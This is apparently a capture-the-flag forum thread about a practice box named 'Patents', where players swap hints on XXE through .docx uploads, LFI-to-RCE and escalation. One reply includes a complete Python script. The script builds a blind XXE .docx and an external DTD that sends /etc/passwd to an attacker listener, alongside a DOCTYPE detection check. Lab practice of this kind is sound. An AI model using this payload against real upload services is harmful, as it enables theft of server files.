Patents

Heya guys, I cannot find the changelog file, only some j**n with installed packages, but I cannot understand how that can help me. Can anyone please nudge?

@seke said:

Heya guys, I cannot find the changelog file, only some j**n with installed packages, but I cannot understand how that can help me. Can anyone please nudge?

Hi, I too needed a nudge for this.

SecLists is the list you need to use; it's not easy to find though, and dirbuster gave a lot of errors along the way.

I may have misread the changelog, but I have to say that it didn't help much in the next stage.

I’m still trying to get the foothold part worked out but this box needs dedication.

If you can successfully complete the first part, you can continue without the need for a changelog file. I personally thought that after spending some time on the first episode, it might have been a rabbit hole, and I gave up. But then I understood and completed it. (I opened Windows and installed an add-in for the relevant document, and I used a Chrome extension. I didn't care about the error it gave while using and saving the Chrome extension.)
If you do this part, you can find your way with the help of standard linux files …

Ok, so I'm getting closer with the XXE, but I keep getting conversion errors when I add in the payload.

If I remove the exploit the file uploads.

I'm just doing LFI at this point; I'm thinking permissions, or I'm just overdoing something.

@jstnlmb2008 said:

Ok, so I'm getting closer with the XXE, but I keep getting conversion errors when I add in the payload.

If I remove the exploit the file uploads.

I'm just doing LFI at this point; I'm thinking permissions, or I'm just overdoing something.

Don’t care about errors…

After a break, back to this, and stuck on www-data.

Any nudges? thanks

@salt said:

After a break, back to this, and stuck on www-data.

Any nudges? thanks

You can possibly spy your way to the next step.

@TazWake said:

@salt said:

After a break, back to this, and stuck on www-data.

Any nudges? thanks

You can possibly spy your way to the next step.

:smiley:

Sorry to be a pain but (and needing another nudge)

I’m trying to figure out the docx configuration but nothing seems to work.

I don’t get any response using public DTD or LFI, all attempts give me an undefined error.

Would I be right in thinking the response I'm looking for won't be rendered on the returned page after submitting the file, and it's more my listener which gets the response?

@jstnlmb2008 said:

Sorry to be a pain but (and needing another nudge)

I’m trying to figure out the docx configuration but nothing seems to work.

I don’t get any response using public DTD or LFI, all attempts give me an undefined error.

Would I be right in thinking the response I'm looking for won't be rendered on the returned page after submitting the file, and it's more my listener which gets the response?

I am away from my notes, so my memory may be fuzzy here (and I didn't get far on this box yet).

The approach I used, after much googling of the terms, was to send a payload which called out to a file I was serving locally, and then the responses were caught in the HTTP traffic.

This allowed enough data exfiltration that I could build a better attack.
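The out-of-band technique described in the post above, written out as an added example (this is not code from the thread, from the box or from its author): the external DTD the attacker serves, a minimal .docx whose word/document.xml loads that DTD, and a defender-side check an upload handler could run. The listener address `http://10.10.14.5:8000`, the DTD name `exfil.dtd` and the target path `/etc/passwd` are assumptions chosen for illustration.

```python
"""Out-of-band (blind) XXE through a .docx upload.

Added example, not code from the thread or from the box. The listener
address, the DTD file name and the target path are assumptions.
"""
import re
import tempfile
import zipfile
from pathlib import Path

LISTENER = "http://10.10.14.5:8000"   # assumption: attacker-controlled HTTP listener
TARGET_FILE = "/etc/passwd"           # assumption: file to read on the server


def build_exfil_dtd(listener: str, target: str) -> str:
    """DTD the attacker serves (e.g. as /exfil.dtd on the listener).

    Parameter entities (%name;) are needed because an entity cannot be
    declared inside another entity's value directly; &#x25; is an escaped
    '%', so the inner declaration only comes into being when %eval; expands.
    The file contents travel in the query string of the request to the
    listener, so the target must not contain newlines or other URL-breaking
    bytes; on PHP targets a php://filter base64 wrapper is the usual fix.
    """
    return (
        f'<!ENTITY % file SYSTEM "file://{target}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'{listener}/?d=%file;\'>">\n'
        "%eval;\n"
        "%exfil;\n"
    )


def build_document_xml(dtd_url: str) -> str:
    """word/document.xml with a DOCTYPE that pulls in the remote DTD.

    Nothing is echoed back into the rendered document: the data leaves in
    the HTTP request the server's XML parser makes while resolving %exfil;,
    which is why the returned page stays blank and the listener sees it.
    """
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE w:document [<!ENTITY % remote SYSTEM "{dtd_url}">%remote;]>\n'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        "<w:body><w:p><w:r><w:t>xxe</w:t></w:r></w:p></w:body></w:document>"
    )


# Smallest set of package parts most converters accept as a Word document.
CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    "</Types>"
)
RELS = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
    "</Relationships>"
)


def build_xxe_docx(path: Path, dtd_url: str) -> Path:
    """Write the malicious .docx (a zip of XML parts) to path."""
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", CONTENT_TYPES)
        zf.writestr("_rels/.rels", RELS)
        zf.writestr("word/document.xml", build_document_xml(dtd_url))
    return path


def find_doctype_parts(path: Path) -> list[str]:
    """Defender-side pre-filter for an upload handler.

    A .docx written by Word or LibreOffice carries no DOCTYPE, so any XML
    part that has one is a red flag. This is only a pre-filter: the real
    fix is to parse every part with DTD loading and external entity
    resolution disabled (defusedxml, or lxml with resolve_entities=False).
    """
    hits = []
    with zipfile.ZipFile(path) as zf:
        for name in zf.namelist():
            if name.endswith((".xml", ".rels")) and re.search(rb"<!DOCTYPE\b", zf.read(name)):
                hits.append(name)
    return sorted(hits)


def demo() -> list[str]:
    """Build the document in a temp dir and run the check against it."""
    with tempfile.TemporaryDirectory() as tmp:
        docx = build_xxe_docx(Path(tmp) / "patent.docx", f"{LISTENER}/exfil.dtd")
        return find_doctype_parts(docx)


if __name__ == "__main__":
    print(build_exfil_dtd(LISTENER, TARGET_FILE))
    print("parts carrying a DOCTYPE:", demo())
```

Serve the DTD from the listener (`python3 -m http.server 8000` in the directory holding `exfil.dtd` is enough), upload the generated document, and watch the listener's access log rather than the page the server returns: with a blind XXE the result is in the `?d=` query string of the callback, not in the response.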

@jstnlmb2008 said:

Sorry to be a pain but (and needing another nudge)

I’m trying to figure out the docx configuration but nothing seems to work.

I don’t get any response using public DTD or LFI, all attempts give me an undefined error.

Would I be right in thinking the response I'm looking for won't be rendered on the returned page after submitting the file, and it's more my listener which gets the response?

As the box creator mentioned, you really need to follow changelog instructions. If not, it will never work.

Finally got user! Feels so good after 20 days!! Thx @seekorswim, your comment helped me find how to finally transform the LFI into RCE!

Got user, trying to pivot to root flag.

I see the hidden stuff in one of the directories and am not sure yet if this is the way forward or a rabbit hole.

The I spy game was fun, made me think about special characters which always catch me out.

It might just be me but did anyone login over ssh remotely?

I'm having to go back to exploit 1 to get back to exploit 3 when I lose the shell.

Shout out to the creator though, you made a very realistic box.

Hmmm, so I think I'm on the last bit, but I could do with a nudge: am I on the correct path of getting the last stage downloaded to me?

I can’t say too much here but I’ve tried to get something to download to me and the result is blank when I should be seeing some content.

I feel like I’m so close in getting what I need but it’s not doing what I expected it to do.

The above statement is referencing the RE/PWN part of another users comments in this discussion.

I found the magical changelog… I need a few nudges on the next steps. I think I understand what is needed but I am not sure.

Got root, but there is some trick where root.txt is hidden

@Cptsticky said:

I found the magical changelog… I need a few nudges on the next steps. I think I understand what is needed but I am not sure.

Still trying to find it, almost 3 days' work for this. Hardest enumeration step ever.

I think the hints were so clear, but I have not yet hit the correct wordlist.

So I’m super stuck on the way to root.

I've got a payload connecting, but it disconnects after exploiting with EOF.

I don’t get if I’m supposed to be attacking the high ports from my host or on the server itself?

There’s an IP address in one of the script files but is that just meaning a local address or another box hosting that same service?

Finally rooted one of the best machines so far.
Respect to @gbyolo for having prepared such a complex and challenging box.
Really learnt something new.
Can't say more hints about the box; the nudges from @seekorswim are perfect.
Keep going, guys!

@hackbarx said:

Got root, but there is some trick where root.txt is hidden

I'm having those exact issues with the leak!!! Had it work a couple of times, but now it won't, no matter what I do.